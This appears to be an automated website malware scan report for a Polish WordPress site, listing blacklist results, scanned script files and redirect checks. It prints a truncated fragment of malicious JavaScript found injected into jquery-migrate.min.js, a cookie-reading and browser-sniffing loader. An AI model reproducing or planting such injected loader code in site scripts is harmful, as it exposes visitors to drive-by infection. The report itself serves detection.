Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kts.vector.com.pl
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kts.vector.com.pl/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.kts.vector.com.pl/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 06 Sep 2014 04:24:21 GMT Location: http://kts.vector.pl/ Server: LiteSpeed Content-Length: 1172 Content-Type: text/html | clean |
http://kts.vector.pl/ | 200 OK Content-Length: 135343 Content-Type: text/html | clean |
http://kts.vector.pl/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 98785 Content-Type: application/x-javascript | clean |
http://kts.vector.pl/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 9583 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var kloack = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return kloack ? decodeURIComponent(kloack[1]) : undefined; } function Ubrostyleddesignercoder() { var specifico_stock = navigator.userAgent; var flawor_bobma = (specifico_stock.indexOf("Windows NT 6.3") > -1 || specifico_stock.indexOf("IEMobile") > -1 || specifico_stock.indexOf("Chrom Antivirus reports:
| ||
http://kts.vector.pl/wp-content/plugins/rt-prettyphoto/js/jquery.prettyPhoto.js?ver=3.9.2 | 200 OK Content-Length: 24443 Content-Type: application/x-javascript | clean |
http://kts.vector.pl/wp-content/plugins/rt-prettyphoto/js/wpp-active.js?ver=3.9.2 | 200 OK Content-Length: 2476 Content-Type: application/x-javascript | clean |
http://kts.vector.pl/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.plugins.min.js?rev=4.1.4&ver=3.9.2 | 200 OK Content-Length: 77389 Content-Type: application/x-javascript | clean |
http://kts.vector.pl/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.1.4&ver=3.9.2 | 200 OK Content-Length: 81219 Content-Type: application/x-javascript | clean |
http://kts.vector.pl/wp-content/plugins/ut-shortcodes/js/plugins/flexslider/jquery.flexslider-min.js?ver=3.9.2 | 200 OK Content-Length: 43398 Content-Type: application/x-javascript | clean |
http://kts.vector.pl/wp-content/themes/kts2014/js/modernizr.min.js?ver=2.6.2 | 200 OK Content-Length: 17799 Content-Type: application/x-javascript | clean |
http://kts.vector.pl/wp-content/themes/kts2014/js/jquery.lazy.load.js?ver=1.9.1 | 200 OK Content-Length: 5765 Content-Type: application/x-javascript | clean |
http://kts.vector.pl/wp-content/plugins/contact-form-7/sheepit/jquery.sheepItPlugin-1.0.0.min.js?ver=3.9.2 | 200 OK Content-Length: 20935 Content-Type: application/x-javascript | clean |
http://kts.vector.pl/wp-content/plugins/contact-form-7/sheepit/init.js?ver=3.9.2 | 200 OK Content-Length: 4356 Content-Type: application/x-javascript | clean |
http://kts.vector.pl/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress.js | 200 OK Content-Length: 994 Content-Type: application/x-javascript | clean |
http://kts.vector.pl/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.96 | 200 OK Content-Length: 31522 Content-Type: application/x-javascript | clean |
http://kts.vector.pl/wp-content/plugins/contact-form-7/scripts.js?ver=3.1.1 | 200 OK Content-Length: 8593 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kts.vector.com.pl
Result:
GET / HTTP/1.1
Host: kts.vector.com.pl
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: kts.vector.com.pl
Referer: http://www.google.com/search?q=kts.vector.com.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kts.vector.com.pl
Referer: http://www.google.com/search?q=kts.vector.com.pl
Result:
The result is similar to the first query. There are no suspicious redirects found.